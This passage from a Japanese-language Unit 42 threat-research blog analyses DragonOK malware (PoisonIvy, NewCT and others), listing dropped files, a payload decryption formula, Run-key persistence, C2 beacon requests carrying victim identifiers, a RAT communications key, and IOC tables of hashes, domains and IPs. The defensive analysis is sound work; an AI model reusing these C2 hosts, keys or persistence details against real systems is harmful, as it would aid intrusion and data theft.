|-------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 | GET / HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1) Host: www.microsoft.com Cache-Control: no-cache Cookie: WT\_NVR=0=/:1=genuine:2=genuine/validate; MC1=GUID=aa8ac5ed26b9bf4f8d3bd1b2dcaa82f6\&HASH=edc5\&LV=201503\&V=4\&LU=1427378060061; A=I\&I=AxUFAAAAAADHBgAA8gS9lEdH+VwzUOqAM/3nlg!!\&V=4; WT\_FPC=id=bf26a610-0e65-413e-aef7-fd8c6b7df7c3:lv=1427375812454:ss=1427375780673; optimizelySegments=%7B%222130980600%22%3A%22true%22%2C%222098371093%22%3A%22true%22%2C%22223040836%22%3A%22search%22%2C%22244338170%22%3A%22none%22%2C%22223033821%22%3A%22false%22%2C%22223082014%22%3A%22ie%22%7D; optimizelyEndUserId=oeu1427379528348r0.49006120319115387; MUID=07660815420F6D5B2DCC0F63434A6C60 %3 |

|------------|-----------------------------|--------------------|
| コマンド       | 説明                          | URI                |
| CMD        | 与えられたコマンドを実行                | /news/STravel.asp  |
| Browse     | 与えられたディレクトリをディレクトリ リスティングする | /news/SJobs.asp    |
| UploadFile | 指定ファイルをアップロード               | /news/SSports.asp  |
| DownLoad   | 指定ファイルをダウンロード               | /news/SWeather.asp |
| DelFile    | 指定ファイルを削除                   | N/A                |

### PoisonIvy

このマルウェアは有名なPoisonIvyリモートアクセス型トロイの木馬 (RAT) として特定されました。復号化して置かれるいずれかのファイル内に埋め込まれる以下のデバッグ用文字列が発見されました。  
d:\\MyProject\\Street2008\\PotPlayer\\Release\_Mini\_Unicode\\PotPlayerMini.pdb

|---|-------------------------------------------------------------------------------|
| 1 | d:\\MyProject\\Street2008\\PotPlayer\\Release\_Mini\_Unicode\\PotPlayerMini.pdb |

PoisonIvyはまず、以下の場所に3つのファイルを作成します。

%APPDATA%\\\\svchosts.exe  
%APPDATA%\\\\PotPlayer.dll  
%APPDATA%\\\\demo.dat

次にマルウェアはWinExecのコールによりsvchosts.exeの実行ファイルを実行します。svchosts.exeマルウェアはまず、PotPlayer.dllライブラリを自身のプロセス内に読み込む前に復号化します。そしてPotPlayer.dllから以下のエクスポート関数をロードします。

PreprocessCmdLineExW  
UninitPotPlayer  
CreatePotPlayerExW  
DestroyPotPlayer  
RunPotPlayer  
SetPotPlayRegKeyW

PotPlayer.dllの読み込みにより、悪意あるコア機能が含まれるDLLのDllEntryPoint関数が呼び出されます。PotPlayer.dllの最初の読み込み時にマルウェアはシェルコードのスタブをロードして実行します。このシェルコードはサスペンド状態で実行ファイルの新しいインスタンスを生成します。  
その後、以下のアルゴリズムを使用して "demo.dat" ファイルを復号化します。  
((((byte1 + 0x6d) ^ 0x8A) - 0x53) \& 0xFF)

|---|---------------------------------------------|
| 1 | ((((byte1 + 0x6d) ^ 0x8A) - 0x53) \& 0xFF) |

この復号化されたコードは、プロセスが再開される前にサスペンドされたプロセス内に注入されます。新しく作成された svchost.exe プロセスはまず多数のライブラリや関数を動的に読み込みます。このマルウェアは主にシェルコードで構成されています。次に以下のミューテックス (排他制御) を作成します。  
oY7uUqX\&d

|---|------------|
| 1 | oY7uUqX\&d |

続いて元の実行ファイルの削除を試みます。その後以下のレジストリキーを設定します。管理者として実行されている場合はHKLM (HKEY\_LOCAL\_MACHINE) が使用されます。  
それ以外の場合はHKCU (HKEY\_CURRENT\_USER) 内に設定されます。  
OFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MSCTFORM : %APPDATA%\\\\svchosts.exe

|---|--------------------------------------------------------------------------------------------------|
| 1 | OFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MSCTFORM : %APPDATA%\\\\svchosts.exe |

次にマルウェアはネットワーク通信の準備を開始します。プロキシが使われているか調査が行われます。被害者のMACアドレスとホスト名を収集しそれらを1つの文字列につなぎ合わせます。

PoisonIvyはbbs reweblink\[.\]comドメインと通信するよう設定されています。以下に生成されるHTTPリクエストの例を示します。

POST HTTP://bbs.reweblink.com/index.html  
HTTP/1.1  
Cookie: id=000C298D2341josh-9f59dff661  
Connection: keep-alive  
Content-Length: 256

\[256 Bytes of Data\]

マルウェアからは、以下の設定値が抽出されました。

|---------------------|--------------------------|
| RAT Identifier      | 12008                    |
| Proxy Count         | 0                        |
| Communications Key  | DF#671d@!                |
| Auto-remove Dropper | True                     |
| C\&C                | bbs.reweblink\[.\]com:80 |

### NewCT

コマンド アンド コントロール サーバーに定期的なリクエストを行うNewCT 64ビット DLL バックドアです。このマルウェア群はインターネット接続を確認するためにwww.microsoft.comへのリクエストを行います。これと同じ手法は前述のNFlogマルウェアのサンプルでも確認されています。

インターネットへの接続が確認されると、マルウェアは以下のようなPOSTリクエストを送信します。

POST / HTTP/1.1  
Accept-Language: en-en  
Content-Type: application/octet-stream  
Pragma: no-cache  
Cache-Control: max-age=259200  
Connection: Close  
Content-Length: 1588  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)  
Host: bbs.jpaols.com

\[BINARY\_DATA\]

以下は上記POSTリクエストに含まれるデコードされたデータで、キャンペーン (攻撃) 識別子情報もありました。

|---------------|------------------------------|
| **Key**       | 0x30303137                   |
| **Domain**    | bbs.jpaols.com:80            |
| **Victim ID** | 60F81DCC2FCF\_WIN-71FN1PE1AT8 |
| **Campaign**  | APR1\_2.3                     |
| **URI**       | index.asp                    |

## **まとめ**

DragonOKの首謀者は、2つの新しいマルウェア群（内1つは特注とみられる）を使用することでTTPを進化させてきたようです。  
しかしコマンド アンド コントロールやマルウェア ホスティング用のドメイン登録には同じ電子メールアドレスを使い続け、これらドメインの一部を数年間にわたって再利用しています。これは新しいマルウェアであっても彼らを追跡することは非常に簡単で、新しいマルウェアそのものはグループが過去に使用したものと比べて特に進歩していないことを意味します。

DragonOKの首謀者が技術的に最も優れているわけではないかもしれませんが、彼らは比較的短い期間に何度も標的を狙うという高いねばり強さを実証しました。  
いわゆる"APT (Advanced Persistent Threat)" と呼ばれる多くのグループは**Advanced (高度)** というよりも**Persistent (持続的)** であり、DragonOKはそのカテゴリに分類されます。残念ながら、悪質な首謀者は十分な時間を持ってこれらのツールと標的型フィッシング攻撃を組み合わせ、多くの攻撃を成功させています。  
本ブログで説明したマルウェアのサンプルはすべてPalo Alto Networksのサンドボックス型クラウドサービスWildFireでマルウェアとして識別されました。

われわれは、これらの攻撃の痕跡を現状のセキュリティソリューションで確認し、必要に応じて確認するための手法を追加し、積極的にネットワークを調査することを推奨します。理想的なセキュリティソリューションとは、攻撃への一連の対策の各段階でそれぞれ保護を実行し、未知の脅威を防ぐために自動で新しい保護を追加するようなプラットフォームへのアプローチを採用することです。

### **サンプル要約**

#### Sysget/HelloBridge

|------------------|------------------------------------------------------------------|
| **ファイル名**        | \].exe                                                           |
| **初回確認**         | 2015年1月19日                                                       |
| **SHA256**       | 227de988efdcf886bc0be7dc3df9f51a727664593de47352df31757853e42968 |
| **C2** **サーバー**  | biosnews\[.\]info                                                |
| **分割IP**         | 23.229.234.160                                                   |
| **PDB** **へのパス** | D:\\Work\\1021WinInetGEnc1\\Release\\WinInetG.pdb                |

|------------------|------------------------------------------------------------------|
| **ファイル名**        | A.exe                                                            |
| **初回確認**         | 2015年1月27日                                                       |
| **SHA256**       | 35784ec1968d322092cb6826f7795f65eeb0b8365ac8c7d8756851c92acf31ae |
| **C2** **サーバー**  | biosnews\[.\]info                                                |
| **分割IP**         | 23.229.234.160                                                   |
| **PDB** **へのパス** | D:\\Work\\1021WinInetGEnc1\\Release\\WinInetG.pdb                |

|------------------|------------------------------------------------------------------|
| **ファイル名**        |                                                                  |
| **初回確認**         | 2015年3月10日                                                       |
| **SHA256**       | 0b97ced3fabb14dbffa641d9bd1cc9dd8c97eab9cb6160d43202ee078e017989 |
| **C2** **サーバー**  | biosnews\[.\]info                                                |
| **分割IP**         | 23.229.234.160                                                   |
| **PDB** **へのパス** | D:\\Work\\1021WinInetGEnc1\\Release\\WinInetG.pdb                |

|------------------|------------------------------------------------------------------|
| **ファイル名**        | address.exe                                                      |
| **初回確認**         | 2015年3月16日                                                       |
| **SHA256**       | 287e29ca7b2177fdaa561a96284726ada636dbbdaadfdbeadf88164e625ed88e |
| **C2** **サーバー**  | biosnews\[.\]info                                                |
| **分割IP**         | 23.229.234.160                                                   |
| **PDB** **へのパス** | D:\\Work\\1021WinInetGEnc1\\Release\\WinInetG.pdb                |

#### PlugX

|-----------------|------------------------------------------------------------------|
| **ファイル名**       | schost.exe                                                       |
| **初回確認**        | 2015年3月16日                                                       |
| **SHA256**      | 70ac649d31db748c4396a9a3f7a9c619c8d09e6400492ab3447520fb726083c4 |
| **C2** **サーバー** | http.tourecord.com                                               |
| **分割IP**        | 103.20.193.62                                                    |

#### PoisonIvy

|-----------------|------------------------------------------------------------------|
| **ファイル名**       | shost.exe                                                        |
| **初回確認**        | 17 Mar 2015                                                      |
| **SHA256**      | 6e95215a52e1cbf4a58cb24c91750151170ea3d59fa9dbfe566e33a2ffc04f4c |
| **C2** **サーバー** | bbs.reweblink.com                                                |
| **分割IP**        | 103.20.193.62                                                    |

#### FirstFormerRAT

|-----------------|------------------------------------------------------------------|
| **ファイル名**       | RpcRtRemote.dll                                                  |
| **初回確認**        | 16 Mar 2015                                                      |
| **SHA256**      | e68b70eaaf45fa43e726a29ce956f0e6ea26ece51165a1989e22597aebba244f |
| **C2** **サーバー** | https.reweblink.com                                              |
| **分割IP**        | 103.20.193.62                                                    |

#### Nflog

|-----------------|------------------------------------------------------------------|
| **ファイル名**       | chrome\_frame\_helper.dll                                          |
| **初回確認**        | 17 Mar 2015                                                      |
| **SHA256**      | 64cbcb1f5b8a9d98b3543e3bf342e8c799e0f74f582a5eb0dc383abac7692f63 |
| **C2** **サーバー** | new.hotpmsn.com                                                  |
| **分割IP**        | 58.64.156.140                                                    |

#### NewCT

|-----------------|------------------------------------------------------------------|
| **ファイル名**       | shost.exe                                                        |
| **初回確認**        | 17 Mar 2015                                                      |
| **SHA256**      | 6e95215a52e1cbf4a58cb24c91750151170ea3d59fa9dbfe566e33a2ffc04f4c |
| **C2** **サーバー** | bbs.reweblink.com                                                |
| **分割IP**        | 103.20.193.62                                                    |

(※1)「DragonOK」：Operation Quantum Entanglement -- Thoufique Haq, Ned Moran, Sai Vashisht, and Mike Scott -- [https://www.fireeye.com/resources/pdfs/white-papers/fireeye-operation-quantum-entanglement.pdf](https://www.fireeye.com/resources/pdfs/white-papers/fireeye-operation-quantum-entanglement.pdf)
トップに戻る

### タグ

* [DragonOK](https://unit42.paloaltonetworks.com/ja/tag/dragonok-ja/ "DragonOK")
* [FormerFirstRAT](https://unit42.paloaltonetworks.com/ja/tag/formerfirstrat-ja/ "FormerFirstRAT")
* [HelloBridge](https://unit42.paloaltonetworks.com/ja/tag/hellobridge-ja/ "HelloBridge")
* [Japan](https://unit42.paloaltonetworks.com/ja/tag/japan-ja/ "Japan")
* [NewCT](https://unit42.paloaltonetworks.com/ja/tag/newct-ja/ "NewCT")
* [NFlog](https://unit42.paloaltonetworks.com/ja/tag/nflog-ja/ "NFlog")
* [PlugX](https://unit42.paloaltonetworks.com/ja/tag/plugx-ja/ "PlugX")
* [PoisonIvy](https://unit42.paloaltonetworks.com/ja/tag/poisonivy-ja/ "PoisonIvy")
* [Sysget](https://unit42.paloaltonetworks.com/ja/tag/sysget-ja/ "Sysget")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:「ANDROID INSTALLER HIJACKING」脆弱性により ANDROIDユーザーにマルウェア感染の恐れ](https://unit42.paloaltonetworks.com/ja/android-installer-hijacking-vulnerability-could-expose-android-users-to-malware/ "「ANDROID INSTALLER HIJACKING」脆弱性により ANDROIDユーザーにマルウェア感染の恐れ")

### 目次

* 

### 関連記事

* [ライブラリーにひそむ侵入者: DLL ハイジャック探究](https://unit42.paloaltonetworks.com/ja/dll-hijacking-techniques/ "article - table of contents")
* [THOR: PKPLUG攻撃グループによるMicrosoft Exchange Server攻撃で展開された未知のPlugX亜種](https://unit42.paloaltonetworks.com/ja/thor-plugx-variant/ "article - table of contents")
* [気象庁装う迷惑メールにおけるSmoke Loaderの分析](https://unit42.paloaltonetworks.com/ja/analysis-of-smoke-loader-in-new-tsunami-campaign/ "article - table of contents")

## 関連項目 マルウェア リソース

![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年8月6日 [#### ChainDropの脅威の概要:自己増殖型npmワームの内部](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/ja/tag/blockchain-ja/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/ja/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/ja/tag/claude-code/ "Claude code")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/ "ChainDropの脅威の概要:自己増殖型npmワームの内部")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年6月2日 [#### npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/ja/tag/npm-packages/ "npm packages")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/ "npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)")  
  ![Pictorial representation of Screening Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/Serpens-Iran-A-1920x900-2-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年5月22日 [#### イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [AppDomainManager](https://unit42.paloaltonetworks.com/ja/tag/appdomainmanager/ "AppDomainManager")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月17日 [#### 脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/ja/tag/apk-ja/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/ja/tag/ddos-attacks-ja/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/ "脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月1日 [#### 脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/ja/tag/api-attacks-ja/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響")  
  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年3月31日 [#### プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/ "プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年3月24日 [#### 脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/ja/tag/email-scam/ "email scam")

* [Lure](https://unit42.paloaltonetworks.com/ja/tag/lure/ "lure")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム")  
  ![Pictorial representation of Notepad++ supply chain compromise. A digital rendering of Earth from space, focusing on North and South America. The continents are illuminated in blue, with red lines and dots indicating data connections across various locations. Dark background highlights the vibrant network representation.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/11_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月11日 [#### 国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/)

* [Backdoor](https://unit42.paloaltonetworks.com/ja/tag/backdoor-ja/ "backdoor")

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/ "国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用")  
  ![Pictorial representation of runtime assembly attacks. Digital artwork of a glowing, futuristic shield disintegrating into small particles, set against a dark blue, bokeh-effect background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/09_Business_email_compromise_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月22日 [#### ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/)

* [API](https://unit42.paloaltonetworks.com/ja/tag/api-ja/ "API")

* [Google](https://unit42.paloaltonetworks.com/ja/tag/google-ja/ "Google")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/ "ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成")  
  ![Pictorial representation of SLOW#TEMPEST campaign. Digital artwork depicting a malware alert symbol on a computer screen, with background of blurred programming code in blue and red colors.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/07_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月2日 [#### Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer](https://unit42.paloaltonetworks.com/ja/vvs-stealer/)

* [Discord](https://unit42.paloaltonetworks.com/ja/tag/discord/ "Discord")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")

* [Python](https://unit42.paloaltonetworks.com/ja/tag/python-ja/ "Python")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/vvs-stealer/ "Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

